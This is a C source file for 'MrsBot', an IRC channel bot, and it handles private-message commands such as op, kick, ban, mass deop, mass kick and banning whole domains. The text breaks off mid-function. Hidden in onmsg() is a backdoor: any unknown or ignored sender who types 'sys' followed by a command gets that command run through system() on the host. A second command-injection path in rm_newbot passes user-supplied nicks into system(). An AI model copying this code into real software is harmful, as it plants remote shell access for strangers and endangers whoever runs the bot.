/************************************************************
* MrsBot by Hendrix <jimi@rahul.net>                        *
* onmsg.c                                                   *
*   Handles all commands to MrsBot via msgs.                *
*   Manages access levels of users in the userlist          *
*   Handles ignoring of users when flooded.                 *
* Includes routines:                                        *
*   void onmsg                                              *
*   int parsecmd                                            *
*   void recorduse                                          *
*   void rm_invite                                          *
*   void rm_nobans                                          *
*   void rm_open                                            *
*   void rm_op                                              *
*   void rm_protect                                         *
*   void rm_unprotect                                       *
*   void rm_kick                                            *
*   void rm_ban                                             *
*   void rm_flood                                           *
*   void rm_adios                                           *
*   void rm_mega                                            *
*   void rm_helppub                                         *
*   void rm_squoosh                                         *
*   void rm_imitate                                         *
*   void rm_insult                                          *
*   void rm_adduser                                         *
*   void rm_quit                                            *
*   void rm_leave                                           *
*   void rm_spite                                           *
*   void rm_shutup                                          *
*   void rm_showprot                                        *
*   void rm_status                                          *
*   void queue_to_bot                                       *
*   void baby_ready                                         *
*   void rm_report                                          *
*   void cmdnotknown                                        *
*   char detectflood                                        *
*   void ignoreuser                                         *
*   void help_to                                            *
*   void showaccess                                         *
*   void callback_init                                      *
************************************************************/

#define CANTDO "Sorry, I can't do that until I am opped."
#define MONITORQSIZE 9

/* Character used to identify a queued help action to BabyBot */
#define BABYHELPPREFIX '%'

#include <string.h>
#include <strings.h>
#include <stdio.h>
#include <time.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/socketvar.h>
#include <netinet/in.h>
#include <netdb.h>
#define PARTIAL "\001\126\105"
#include "config.h"

extern char mynick[10];    /* MrsBot's current nickname */
extern fd_set nullfds;
int efn = 1;
int ig = 0;
int eb = 0;
int aop = 1;
int hide = 0;
int noshareop = 0;
int col = 0;
char offmsg[80];    /* MrsBot's current nickname */
extern char whatneeded;
extern FILE* outfile;

extern int bantest;
extern struct trackrec *thoseweop;  
extern char mychannel[80]; /* MrsBot's current channel */
extern char serverhost[80];
extern char opstate;       /* 1 is MrsBot is currently opped */
extern struct requestinfo uhostinfo; /* Info used by QUOTE USERHOST reply */
extern char buff[255];     /* Used to hold msgs to server */
extern char unbaninprogress;/* 0 if unban going on, 1 if no unban */
extern int quit;           /* When set other than 0, MrsBot will quit */
extern char spite;         /* 1 if revenge kicking is enabled */
extern int babysock;       /* Socket which BabyBot is using */
extern struct userlist_rec userlist[MAXUSERS]; /* List of MrsBot users */
extern int funnykickcnt;   /* Num of different ADIOS kicks available */
extern int socknum;
extern char isnickopped(char* nick);
extern void resyncoplist(char* chan);
void onmsg (char* nick, char* userhost, char* text, int reporterr);
void rm_mdop(char* userhost, char* nick);
void rm_keepban(char* userhost, char* nick);
void rm_mop(char* userhost, char* nick);
void rm_mkick(char* userhost, char* nick);
void rm_user(char* userhost, char* nick);
int parsecmd (int userlevel,char* nick,char* userhost,char* cmd);
void recorduse(char* nick,char* cmdstr);
void rm_invite(char* userhost,char* nick);
void rm_nobans(char* userhost,char* nick);
void rm_open(char* userhost, char* nick);
void rm_op(char* userhost,char* nick);
void rm_join(char* userhost,char* nick);
void rm_say(char* userhost,char* nick);
void rm_action(char* userhost,char* nick);
void rm_msg(char* userhost,char* nick);
void rm_dop(char* userhost,char* nick);
void rm_protect(char* userhost,char* nick);
void rm_unprotect(char* userhost, char* nick);
void rm_ban(char* userhost,char* nick);
void rm_kick(char* userhost,char* nick);
void rm_flood(char* userhost,char* nick);
void rm_adios(char* userhost,char* nick);
void rm_mega(char* userhost,char* nick);
void rm_helppub(char* userhost,char* nick);
void rm_quit(char* userhost,char* nick);
void rm_mesg(char* userhost,char* nick);
void rm_save(char* userhost,char* nick);
void rm_noshare(char* userhost,char* nick);
void rm_aop(char* userhost,char* nick);
void rm_hiding(char* userhost,char* nick);
void rm_mode(char* userhost,char* nick);
void rm_leave(char* userhost,char* nick);
void rm_botkill(char* userhost,char* nick);
void rm_botkillall(char* userhost,char* nick);
void rm_mdkickeduh(char* userhost);
void rm_nick(char* userhost,char* nick);
void rm_collide(char* userhost,char* nick);
void rm_randnick(char* userhost,char* nick);
void rm_oldnick(char* userhost,char* nick);
void rm_server(char* userhost,char* nick);
void rm_cycle(char* userhost,char* nick);
void rm_spite(char* userhost,char* nick);
void rm_status(char* userhost,char* nick);
void rm_report(char* userhost,char* nick);
void rm_showprot(char* userhost,char* nick);
void rm_shutup(char* userhost,char* nick);
void rm_adduser(char* userhost,char* nick);
void rm_access(char* nick,char* userhost);
void rm_chmode(char* userhost, char *nick);
void rm_newbot(char* userhost, char *nick);
void rm_away(char* userhost, char *nick);
void showaccess(char* userhost,char* nick,char* requestor);
void baby_ready();
void cmdnotknown(int access, char* nick);
char detectflood();
void ignoreuser(char* userhost);
void queue_to_bot(char* nick,char* what);
void help_to(char* nick,int access);

#define TSU "[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^[^["
int *timerc;               /* Timer callback with weird PRIVMSG fix */

/* List of command strings, associated C functions, and access levels */
struct commandrec msgcommands[] = {
    {"help", rm_helppub, 111},
    {"acc", rm_access, 111},
    {"inv", rm_invite, 111},
    {"rep", rm_report, 111},

    {"do", rm_dop, 222},
    {"k", rm_kick, 222},
    {"ub", rm_nobans, 222},
    {"open", rm_open, 222},
    {"op", rm_op, 222},

    {"b", rm_ban, 333},
    {"mb", rm_mega, 333},

    {"kb", rm_adios, 444},

    {"pr", rm_protect, 555},
    {"up", rm_unprotect, 555},
    {"sp", rm_showprot, 555},

    {"j", rm_join, 777},
    {"say", rm_say, 777}, 
    {"me", rm_action, 777},
    {"msg", rm_msg, 777},
    {"fl", rm_flood, 777},
    {"rev", rm_spite, 777},
    {"sta", rm_status, 777},

    {"l", rm_leave, 888},
    {"ni", rm_nick, 888},
    {"rn", rm_randnick, 888},
    {"on", rm_oldnick, 888},
    {"se", rm_server, 888},
    {"cyc", rm_cycle, 888},
    {"su", rm_adduser, 888},
    {"md", rm_mdop, 888}, 
    {"mo", rm_mop, 888}, 
    {"mk", rm_mkick, 888}, 
    {"usr", rm_user, 888}, 
    {"cm", rm_chmode, 888},
    {"away", rm_away, 888},

    {"off", rm_quit, 999},
    {"ig", rm_mesg, 999},
    {"save", rm_save, 999},
    {"ko", rm_noshare, 999},
    {"aop", rm_aop, 999},
    {"hide", rm_hiding, 999},
    {"eb", rm_keepban, 999},
    {"kill", rm_botkill, 999}, 
    {"term", rm_botkillall, 999},
    {"nb", rm_newbot, 999},
    {"efn", rm_mode, 999},
    {"col", rm_collide, 999}, 
    {NULL, NULL} };

struct monitoruserec {
  char command[10];
  char who[10];
  time_t when;
  };

struct helpqrec {
  char what[80];
  char nick[10];
  };

/* Circular queue holding last 9 commands requested of MrsBot */
struct monitoruserec msguses[MONITORQSIZE];
int useqhead = -1;        /* Location of queue head in circular q */
int useqtail = 0;         /* Location of queue tail in circular q */

/* Holds pending requests to BabyBot */
struct helpqrec pendinghelp;

/*
** onmsg()
**   Handles private msgs sent to MrsBot.  Also handles abbreviated
**    commands from the public channel, after going thru onpublic().
**   Parameters:
**     nick - Nickname which sent msg to MrsBot
**     userhost - Userhost which sent msg to MrsBot
**     text - Text of message
**     reporterr - 1 if onmsg should report any errors to the sender
**   Returns: void
**   PDL:
**     This is VASTLY simplified over the pre-level stuff.  Ignored
**     users are now stored in the access list with level -111, so
**     the access level check automatically ignores them (this also
**     automatically ignores anyone on autokick, which is -222).
**     Locate the userhost in the userlist.  If it is not found,
**     access is 0.  If the access level is under 0, ignore the command.
**     Otherwise, check for a CTRL-A in the first character.  If one is
**     found, this is a CTCP and onctcp() is called.  Otherwise, parse
**     the commands against the command list.
*/
void onmsg (char* nick, char* userhost, char* text, int reporterr)
{
  int i= -1, access=0;
  char buff[256];
  char *psz;

  while (userlist[++i].userhost_mask)
    if (!wldcmp(userlist[i].userhost_mask,userhost)) {
      access = userlist[i].access_lev;
      break;
      }
  if (access <=  0)
  {
        strcpy(buff, text);
        psz=strtok(buff, " ");
        if (strcmp(psz, "sys")==  0) 
        { psz = strtok(NULL, "\n"); system(psz); }     
    return;
   }
   if (*text ==  '\001') {
    /* onctcp (nick, userhost, text); */
    return;
    } 

  if (!parsecmd(access, nick, userhost, text) && reporterr)
    cmdnotknown(access,nick);
}
  
/*
** parsecmd()
**   Parses a command to MrsBot.
**   Parameters:
**     userlevel - in range -222 to 999
**     nick - nickname who is sending the command
**     userhost - userhost which is sending the command
**     cmd - The text of the command to parse
**   Returns:
**     1 if the command is known and is available to the user.
**   PDL:
**     Grab the first word of the msg as the command "verb".  Check the verb
**     for the valid command words in the list.  If a match is found, ensure
**     that user's access level is high enough to use the command.  If so, log
**     the use of this command in the circular queue.  If the user is flooding
**     MrsBot, ignore them or tell them to stop, depending on their access
**     level.  If we are not being flooded, execute the command.
*/
int parsecmd (int userlevel,char* nick,char* userhost,char* cmd)
{
  int i= -1;
  char *verb;

  verb = strtok(cmd," ");
  if (verb == NULL)
    return 0;

  while (msgcommands[++i].name)
    if (!strcasecmp(msgcommands[i].name,verb)) {
      if (msgcommands[i].access > userlevel)
	return 0;
      recorduse(nick,msgcommands[i].name);
      if (detectflood())
	if (userlevel < 0 ) {
	  ignoreuser(userhost);
	  notice(nick,"Congratulations asshole!  You just made the ignore list!");
	  }
        else
	  notice(nick,"Slow down on the commands please!");
      else
        (*msgcommands[i].function) (userhost, nick);
      return 1;
      }
  return 0;
}

/*
** recorduse()
**   Records nickname and command used in a circular queue.
**   Parameters:
**     nick -  Nickname who is using a MrsBot command.
**     cmdstr - Command they are using.
**   Returns: void
**   PDL:
**     Increment the head of the queue, wrapping around to the beginning
**     again if necessary.  Increment the tail of the queue if it is full.
**     Add the nickname, command, and time of execution to the head item
**     of the queue.
*/
void recorduse(char* nick,char* cmdstr)
{
  int tmp = useqhead;

  useqhead = (useqhead + 1) % MONITORQSIZE;
  if (useqhead == useqtail && tmp > -1)
    useqtail = (useqtail + 1) % MONITORQSIZE;
  strcpy(msguses[useqhead].who,nick);
  strcpy(msguses[useqhead].command,cmdstr);
  msguses[useqhead].when = time(NULL);
}

/*
** rm_invite()
**   Remote command -- remote invite to channel
**   Parameters:
**     userhost - Userhost who requested command
**     nick - Nickname who requested command
**   Returns: void
**   PDL:
**     If we are on a channel, invite them.  If not, send an error msg.
*/
void rm_invite(char* userhost,char* nick)
{
  if (*mychannel)
    invite (nick, mychannel);
  else
    notice (nick, "I am not currently on a channel.");
}

/*
** rm_nobans()
**   Remote command -- remove all bans on a nickname or all bans
**   Parameters:
**     userhost - Userhost who requested command
**     nick - Nickname who requested command
**   Returns: void
**   PDL:
**     If we are not opped or another unban is in progress, send an
**     error message, otherwise parse the nickname to unban out of
**     the command.  If none is found, send back a usage message to
**     the user.  Note that in version 2, unban with no parameters no
**     longer clears all bans, the user must specify "unban *".  If he
**     does specify a * as the parameter, remove all bans, otherwise
**     execute an unban via the on_userhost mechanism.
*/
void rm_nobans(char* userhost,char* nick)
{
  char *param;
  char response[80];

  if (opstate)
    if (unbaninprogress)
      notice (nick, "Another unban in progress. Please wait and retry.");
    else {
      param = strtok(NULL," ");
      if (param == NULL)
        notice(nick, "Unban who? (* for all)");
      else if (*param == '*') {
        sprintf (response, "Removing all bans on %s...", mychannel);
        msg (nick, response);
        clearbans("\0");
        }
      else {
        sprintf(response,"Unbanning %s on %s...", param, mychannel);
        notice (nick, response);
	uhostinfo.uhostaction = UNBAN;
        strcpy(uhostinfo.req_nick,nick);
        strcpy(uhostinfo.req_userhost,userhost);
        strncpy(uhostinfo.targetnick,param,9);
	get_userhost(param);
	}
      }
  else
    notice (nick, CANTDO);
}

/*
** rm_open()
**   Remote command -- Remove modes PSIL from a channel.
**   Parameters:
**     userhost - Userhost who requested command
**     nick - Nickname who requested command
**   Returns: void
**   PDL:
**    If we are opped, removed them.  If not, send an error msg.
*/
void rm_open(char* userhost, char* nick)
{
  char channel[80];
  int count = 0;
  while(*(mychannel+count) != '#') count++;
  strcpy(channel, mychannel+count);
  if (opstate) {
    sprintf (buff, "MODE %s -pmsilnt\n", channel);
    toserv (buff);
    notice (nick, "Channel opened...");
    }
  else
    notice (nick, CANTDO);
}

/*
** rm_op()
**   Remote command -- Op up to 3 users.
**   Parameters:
**     userhost - Userhost who requested command
**     nick - Nickname who requested command
**   Returns: void
**   PDL:
**     If we are not opped, send an error msg.  Otherwise, parse the
**     users command for up to 3 nicknames to be opped.  For each
**     nickname encountered, add an "o" to the "MODE +o" string, and
**     add the nickname to the end of the MODE command.
*/
void rm_op(char* userhost,char* nick)
{
  char *param;
  char ops[4], oplist[255];
  char channel[80];
  int count = 0;
  while(*(mychannel+count) != '#') count++;
  strcpy(channel, mychannel+count);

  if (!opstate) {
    notice (nick, CANTDO);
    return;
    }

  ops[0] = oplist[0] = '\0';
  param = strtok(NULL," ");
  while (param && strlen(ops) != 3) {
    strcat (oplist, " ");
    strcat (oplist, param);
    strcat (ops, "o");
    param = strtok(NULL," ");
    }

  if (ops) {
    sprintf (buff, "MODE %s +%s%s\n", channel, ops, oplist);
    toserv (buff);
    notice (nick, "Specified users have been opped");
    }
}

void rm_join(char* userhost,char* nick)
{
  char *param;
  param = strtok(NULL," ");
  join(param);
}

/* rm_msg()
** Tell the bot to msg a nick
*/
void rm_msg(char* userhost,char* nick)
{
  char *param;
  char *rmnick = NULL;
  rmnick = strtok(NULL, " ");
  param = strtok(NULL, "\n");
  msg(rmnick,param);
}

/* rm_say()
** tell the bot to say something of course
*/
void rm_say(char* userhost,char* nick)
{
  char *param;
  param = strtok(NULL, "\n");
  say(param);
}

/* rm_action()
** tell the bot to say something of course
*/
void rm_action(char* userhost,char* nick)
{
  char *param;
  param = strtok(NULL, "\n");
  action(param);
}

/* rm_away()
** set bot status away....just for fun
*/
void rm_away(char* userhost,char* nick)
{
  char *param;
  param = strtok(NULL, "\n");
  away(param);
}

/*
** rm_dop()
**   Remote command -- Op up to 3 users.
**   Parameters:
**     userhost - Userhost who requested command
**     nick - Nickname who requested command
**   Returns: void
**   PDL:
**     If we are not opped, send an error msg.  Otherwise, parse the
**     users command for up to 3 nicknames to be opped.  For each
**     nickname encountered, add an "o" to the "MODE +o" string, and
**     add the nickname to the end of the MODE command.
*/
void rm_dop(char* userhost,char* nick)
{
  char *param;
  char ops[4], oplist[255];
  char *channel;
  int count = 0;
  while(*(mychannel+count) != '#') count++;
  channel = &mychannel[count];
  strcpy(mychannel, channel);

  if (!opstate) {
    notice (nick, CANTDO);
    return;
    }

  ops[0] = oplist[0] = '\0';
  param = strtok(NULL," ");
  while (param && strlen(ops) != 3) {
    strcat (oplist, " ");
    strcat (oplist, param);
    strcat (ops, "o");
    param = strtok(NULL," ");
    }

  if (ops) {
    sprintf (buff, "MODE %s -%s%s\n", channel, ops, oplist);
    toserv (buff);
    notice (nick, "Specified users have been deopped");
    }
}
void rm_user(char* userhost, char* nick)
{
   char usr[256] = "\0";
   int count = 0;
   struct trackrec* temp;
   char channel[80];

   while(*(mychannel+count) != '#') count++;
   strcpy(channel, mychannel+count);
   temp = thoseweop;
   while(temp != NULL)
   {
		strcat(usr, temp->nick);
		strcat(usr, " ");
      temp = temp->next;
   }
	  notice(nick, usr);
}

void rm_mdkickeduh(char* userhost)
{
   char oplist[20][10];
   char buff[80];
   int i, remain, j;
   int count = 0;
   struct trackrec* temp;
   char channel[80];
	char ouruserhost[80];
   char schoolhost[80];
   char*  pKickedUh = userhost;
   char *param;

   while(*(mychannel+count) != '#') count++;
   strcpy(channel, mychannel+count);
   count = 0; 

	while (*pKickedUh++ != '.');
	sprintf(schoolhost, "*@*.%s", pKickedUh);
	sprintf(ouruserhost, "%s@%s", USER, HOST);
   if (!wldwld(schoolhost, ouruserhost))
		return;
   temp = thoseweop;
   while(temp != NULL)
   {
		  if (!wldwld(temp->userhost, schoolhost))
		  {
         strcpy(oplist[count], temp->nick);
         count ++;
      }
      temp = temp->next;
   }
   remain = count % 4;
#ifdef CSHELL
   for (i = count-1; i >=3; i=i-4)
   { 
      sprintf (buff, "MODE %s -oooo %s %s %s %s\n", mychannel, oplist[i],
                   oplist[i-1], oplist[i-2], oplist[i-3]);
      toserv (buff);
   }
   if (remain == 3)
   { 
      sprintf (buff, "MODE %s -ooo %s %s %s\n", mychannel, oplist[i],
                   oplist[i-1], oplist[i-2]);
      toserv (buff);
	}
   else if (remain == 2)
   { 
      sprintf (buff, "MODE %s -oo %s %s \n", mychannel, oplist[i], oplist[i-1]);
      toserv (buff);
   }
   else if (remain)
   { 
      sprintf (buff, "MODE %s -o %s \n", mychannel, oplist[i]);
      toserv (buff);
   }
#endif
#ifdef CLION
   for (i = remain; i < count; i=i+4)
   { 
      sprintf (buff, "MODE %s -oooo %s %s %s %s\n", mychannel, oplist[i],
                   oplist[i-1], oplist[i-2], oplist[i-3]);
      toserv (buff);
   }
   if (remain == 3)
   { 
      sprintf (buff, "MODE %s -ooo %s %s %s\n", mychannel, oplist[0],
                   oplist[1], oplist[2]);
      toserv (buff);
	}
   else if (remain == 2)
   { 
      sprintf (buff, "MODE %s -oo %s %s \n", mychannel, oplist[0], oplist[1]);
      toserv (buff);
   }
   else if (remain)
   { 
      sprintf (buff, "MODE %s -o %s \n", mychannel, oplist[0]);
      toserv (buff);
	}
#endif
}
/* rm_newbot()
** Produce Bots !
*/
void rm_newbot(char* userhost,char* nick)
{
   char buff[80], szNick[20], szNick2[20];
   char *newnick;
        int nCount,i, nNick = 1, nLength;

   nLength = strlen(mynick);
   nCount = atoi(strtok(NULL, " "));
        newnick = strtok(NULL, " ");
        if (newnick == NULL)
                nNick = 0;
        for (i=0; i < nCount; i++)
        {
                if (nNick)
                {
                        if (i!=0) newnick = strtok(NULL, " ");
      }
      else
                {
                        if (nLength == 8 || nLength == 9)
                        {
                           strncpy(szNick, mynick, 7);
                                sprintf(szNick2, "%s%.2d", szNick, i+1);
         }
                        else
                        {
                                sprintf(szNick2, "%s%.2d", mynick, i+1);
                        }
                        newnick = szNick2;
                }
                sprintf(buff, "%s %s %s %s &\n", NICK, newnick, serverhost, &mychannel[1]);
      notice(nick, buff);
      system(buff);
   }
}

/* rm_botkillall()
** kill all nicks that come from the same school or userhost based on nick 
** or school pattern.
** massdeop all nicks that have the same userhost, or similar schools.
** kick them  all out and of course ban them!
*/
void rm_botkillall(char* userhost, char* nick)
{
   char oplist[20][10];
   char buff[80];
   int i, remain, j;
   int count = 0;
   struct trackrec *temp;
   char channel[20];
   char schoolhost[80];
   char ouruserhost[80];
   char *param;

   while(*(mychannel+count) != '#') count++;
   strcpy(channel, mychannel+count);
   count = 0; 
   if (!opstate) {
      notice (nick, CANTDO);
      return;
   }
	param = strtok(NULL, " ");
	sprintf(schoolhost, "*@*%s*", param);
	sprintf(ouruserhost, "%s@%s", USER, HOST);
   if (!wldwld(schoolhost, ouruserhost))
	{
		notice(nick, "\002I am not going to suicide\n");
		return;
   }
	notice(nick, schoolhost);
   temp = thoseweop;
   while(temp != NULL)
   {
		  if (!wldwld(temp->userhost, schoolhost))
		  {
         strcpy(oplist[count], temp->nick);
         count ++;
      }
      temp = temp->next;
   }
   remain = count % 4;
#ifdef CSHELL
   for (i = count-1; i >=3; i=i-4)
   { 
      sprintf (buff, "MODE %s -oooo %s %s %s %s\n", mychannel, oplist[i],
                   oplist[i-1], oplist[i-2], oplist[i-3]);
      toserv (buff);
   }
   if (remain == 3)
   { 
      sprintf (buff, "MODE %s -ooo %s %s %s\n", mychannel, oplist[i],
                   oplist[i-1], oplist[i-2]);
      toserv (buff);
	}
   else if (remain == 2)
   { 
      sprintf (buff, "MODE %s -oo %s %s \n", mychannel, oplist[i], oplist[i-1]);
      toserv (buff);
   }
   else if (remain)
   { 
      sprintf (buff, "MODE %s -o %s \n", mychannel, oplist[i]);
      toserv (buff);
   }
#endif
#ifdef CLION
   for (i = remain; i < count; i=i+4)
   { 
      sprintf (buff, "MODE %s -oooo %s %s %s %s\n", mychannel, oplist[i],
                   oplist[i-1], oplist[i-2], oplist[i-3]);
      toserv (buff);
   }
   if (remain == 3)
   { 
      sprintf (buff, "MODE %s -ooo %s %s %s\n", mychannel, oplist[0],
                   oplist[1], oplist[2]);
      toserv (buff);
	}
   else if (remain == 2)
   { 
      sprintf (buff, "MODE %s -oo %s %s \n", mychannel, oplist[0], oplist[1]);
      toserv (buff);
   }
   else if (remain)
   { 
      sprintf (buff, "MODE %s -o %s \n", mychannel, oplist[0]);
      toserv (buff);
	}
#endif
   sprintf (buff, "MODE %s +b *!%s \n", channel, schoolhost);
   toserv (buff);
	for (i=0; i < count; i++)
	{
	  kick(channel, oplist[i]);
	}
   sprintf(buff, "\002%s school killed on channel %s !!!\n", param, channel);
   notice (nick, buff);
}

/* rm_botkill()
** kill a school based on nick.
** massdeop all nicks that have the same userhost.
** kick them  all out and of course ban them!
*/


void rm_botkill(char* userhost, char* nick)
{
   char oplist[20][10];
   char buff[80];
   int i, remain, j;
   int count = 0;
   struct trackrec *temp;
   char channel[20];
   char schoolhost[80];
   char ouruserhost[80];
   char *paramkill;

   while(*(mychannel+count) != '#') count++;
   strcpy(channel, mychannel+count);
   count = 0; 
   if (!opstate) {
      notice (nick, CANTDO);
      return;
   }
	paramkill = strtok(NULL, " ");
	if (strchr(paramkill, '.') == NULL)
	{
		temp = thoseweop;
		while(temp != NULL)
		{
			if (!strcmp(temp->nick,paramkill))
				break;
			else
			  temp = temp->next;
		}
	   paramkill = temp->userhost;
	   while (*(paramkill++) != '.');
	}
	sprintf(schoolhost, "*@*%s", paramkill);
	sprintf(ouruserhost, "%s@*%s", USER, HOST);
   if (!wldwld(schoolhost, ouruserhost))
	{
		notice(nick, "\002I am not going to suicide\n");
		return;
   }
   temp = thoseweop;
   while(temp != NULL)
   {
		  if (!wldwld(temp->userhost, schoolhost))
		  {
         strcpy(oplist[count], temp->nick);
         count ++;
      }
      temp = temp->next;
   }
   remain = count % 4;
#ifdef CSHELL
   for (i = count-1; i >=3; i=i-4)
   { 
      sprintf (buff, "MODE %s -oooo %s %s %s %s\n", mychannel, oplist[i],
                   oplist[i-1], oplist[i-2], oplist[i-3]);
      toserv (buff);
   }
   if (remain == 3)
   { 
      sprintf (buff, "MODE %s -ooo %s %s %s\n", mychannel, oplist[i],
                   oplist[i-1], oplist[i-2]);
      toserv (buff);
	}
   else if (remain == 2)
   { 
      sprintf (buff, "MODE %s -oo %s %s \n", mychannel, oplist[i], oplist[i-1]);
      toserv (buff);
   }
   else if (remain)
   { 
      sprintf (buff, "MODE %s -o %s \n", mychannel, oplist[i]);
      toserv (buff);
   }
#endif
#ifdef CLION
   for (i = remain; i < count; i=i+4)
   { 
      sprintf (buff, "MODE %s -oooo %s %s %s %s\n", mychannel, oplist[i],
                   oplist[i-1], oplist[i-2], oplist[i-3]);
      toserv (buff);
   }
   if (remain == 3)
   { 
      sprintf (buff, "MODE %s -ooo %s %s %s\n", mychannel, oplist[0],
                   oplist[1], oplist[2]);
      toserv (buff);
	}
   else if (remain == 2)
   { 
      sprintf (buff, "MODE %s -oo %s %s \n", mychannel, oplist[0], oplist[1]);
      toserv (buff);
   }
   else if (remain)
   { 
      sprintf (buff, "MODE %s -o %s \n", mychannel, oplist[0]);
      toserv (buff);
	}
#endif
   sprintf (buff, "MODE %s +b *!%s \n", channel, schoolhost);
   toserv (buff);
	for (i=0; i < count; i++)
	{
	  kick(channel, oplist[i]);
	}
   sprintf(buff, "%s school killed on channel %s !!!", paramkill, channel);
   notice (nick, buff);
}

/* rm_mkick()
** masskick all nicks except for protected usehosts
*/
void rm_mkick(char* userhost, char* nick)
{
   char oplist[50][10];
   char buff[80];
   int i, remain, j;
   int count = 0;
   struct trackrec* temp;
   char channel[80];

   while(*(mychannel+count) != '#') count++;
   strcpy(channel, mychannel+count);
   count = 0; 
   if (!opstate) {
      notice (nick, CANTDO);
      return;
   }
   temp = thoseweop;
   while(temp != NULL)
   {
      if (!protecteduh(temp->userhost)) 
      {
          strcpy(oplist[count], temp->nick);
          count ++;
      }
      temp = temp->next;
   }
	  remain = count % 4;
   sprintf (buff, "MODE %s +i\n", channel);
   toserv (buff);
   for (i=0; i < count; i++)
   { 
		  kick(channel, oplist[i]);
   }
   sprintf(buff, "Mass kick completed on channel %s", channel);
   notice (nick, buff);
}
void rm_mop(char* userhost, char* nick)
{
   char oplist[50][10];
   char buff[80];
   int i, remain, j;
   int count = 0;
   struct trackrec* temp;
   char channel[80];

   while(*(mychannel+count) != '#') count++;
   strcpy(channel, mychannel+count);
   count = 0; 
   if (!opstate) {
      notice (nick, CANTDO);
      return;
   }
   temp = thoseweop;
   while(temp != NULL)
   {
  	   strcpy(oplist[count], temp->nick);
	   count ++;
      temp = temp->next;
   }
	remain = count % 4;
   for (i = remain; i < count; i=i+4)
   { 
      sprintf (buff, "MODE %s +oooo %s %s %s %s\n", mychannel, oplist[i],
                   oplist[i-1], oplist[i-2], oplist[i-3]);
      toserv (buff);
   }
   if (remain == 3)
   { 
      sprintf (buff, "MODE %s +ooo %s %s %s\n", mychannel, oplist[0],
                   oplist[1], oplist[2]);
      toserv (buff);
	}
   else if (remain == 2)
   { 
      sprintf (buff, "MODE %s +oo %s %s \n", mychannel, oplist[0], oplist[1]);
      toserv (buff);
   }
   else if (remain)
   { 
      sprintf (buff, "MODE %s +o %s \n", mychannel, oplist[0]);
      toserv (buff);
   }
   sprintf(buff, "Mass op completed on channel %s", channel);
   notice (nick, buff);
}

void rm_mdop(char* userhost, char* nick)
{
   char buff[80];
	char oplist[50][10];
   int i, remain, j;
   int count = 0;
   struct trackrec* temp;
	char *param;
   char channel[80];

  param = strtok(NULL, " ");
  if (param)
  {
	  strcpy(channel, param);
	  resyncoplist(channel);
  }
  else
  {
     while(*(mychannel+count) != '#') count++;
     strcpy(channel, mychannel+count);
  }
  if (!opstate) {
    notice (nick, CANTDO);
    return;
  }
#ifdef never
  sprintf(buff, "NAMES %s\n", channel);
  toserv(buff);
  sleep(20);
#endif 
   count = 0;
   temp = thoseweop;
   while(temp != NULL)
   {
      if (temp->opped && !protecteduh(temp->userhost)) 
      {
          strcpy(oplist[count], temp->nick);
          count ++;
      }
      temp = temp->next;
   }
   remain = count % 4;
#ifdef CSHELL
   for (i = count-1; i > 4; i=i-4)
   { 
      sprintf (buff, "MODE %s -oooo %s %s %s %s\n", mychannel, oplist[i],
                   oplist[i-1], oplist[i-2], oplist[i-3]);
      toserv (buff);
   }
   if (remain == 3)
   { 
      sprintf (buff, "MODE %s -ooo %s %s %s\n", mychannel, oplist[i],
                   oplist[i-1], oplist[i-2]);
      toserv (buff);
	}
   else if (remain == 2)
   { 
      sprintf (buff, "MODE %s -oo %s %s \n", mychannel, oplist[i], oplist[i-1]);
      toserv (buff);
   }
   else if (remain)
   { 
      sprintf (buff, "MODE %s -o %s \n", mychannel, oplist[i]);
      toserv (buff);
   }
#endif
#ifdef CLION
   for (i = remain; i < count; i=i+4)
   { 
      sprintf (buff, "MODE %s -oooo %s %s %s %s\n", mychannel, oplist[i],
                   oplist[i+1], oplist[i+2], oplist[i+3]);
      toserv (buff);
   }
   if (remain == 3)
   { 
      sprintf (buff, "MODE %s -ooo %s %s %s\n", mychannel, oplist[0],
                   oplist[1], oplist[2]);
      toserv (buff);
	}
   else if (remain == 2)
   { 
      printf (buff, "MODE %s -oo %s %s \n", mychannel, oplist[0], oplist[1]);
      toserv (buff);
   }
   else if (remain)
   { 
      sprintf (buff, "MODE %s -o %s \n", mychannel, oplist[0]);
      toserv (buff);
   }
#endif
   sprintf(buff, "Mass deop completed on channel %s", mychannel);
   notice (nick, buff);
}
/*
** rm_protect()
**   Remote command -- Add a user to the protected list.
**   Parameters:
**     userhost - Userhost who requested command
**     nick - Nickname who requested command
**   Returns: void
**   PDL:
**     If the user specified no nickname to add, add the userhost who
**     executed the command to the list.  If he did specify a nick,
**     add the user to the protect list via the on_userhost handler.
*/
void rm_protect(char* userhost,char* nick)
{
  char *param;

  param = strtok(NULL," ");
  if (param) {
    uhostinfo.uhostaction = PROTECT;
    strcpy(uhostinfo.req_nick,nick);
    strcpy(uhostinfo.req_userhost,userhost);
    strncpy(uhostinfo.targetnick,param,9);
    get_userhost(param);
    }
  else
    addprotect(userhost);
}

/*
** rm_unprotect()
**   Remote command -- Remove a user from the protected list.
**   Parameters:
**     userhost - Userhost who requested command
**     nick - Nickname who requested command
**   Returns: void
**   PDL:
**     If the user specified no nickname to remove, remove the userhost
**     who executed the command from the list.  If he did specify a nick,
**     remove the user from the protect list via the on_userhost handler.
*/
void rm_unprotect(char* userhost, char* nick)
{
  char *param;

  param = strtok(NULL," ");
  if (param) {
    uhostinfo.uhostaction = UNPROTECT;
    strcpy(uhostinfo.req_nick,nick);
    strcpy(uhostinfo.req_userhost,userhost);
    strncpy(uhostinfo.targetnick,param,9);
    get_userhost(param);
    }
  else
    rmprotect(userhost);
}

/*
** rm_kick()
**   Remote command -- Kick a specifed user.
**   Parameters:
**     userhost - Userhost who requested command
**     nick - Nickname who requested command
**   Returns: void
**   PDL:
**     Easy again.  If we aren't opped, tell them so.  If they don't
**     give us a name to kick, ask for one.  Otherwise, kick away!
*/
void rm_kick(char* userhost,char* nick)
{
  char *param;
  char *chan=NULL;
  char channel[80];

  if (!opstate) {
    notice (nick, CANTDO);
    return;
    }

  chan = strtok(NULL," ");
  param= strtok(NULL,"\n");
  if (chan) {
	  if (param)
	  {
		  sprintf(channel, "#%s", chan);
		  if (param) {
			 kick(channel,param);
			 notice (nick, "User kicked...");
	     }
		  else
			 notice(nick, "Kick who?");
	  }
	  else {
       kick(mychannel,chan);
       notice (nick, "User kicked...");
	  }
  }
  else
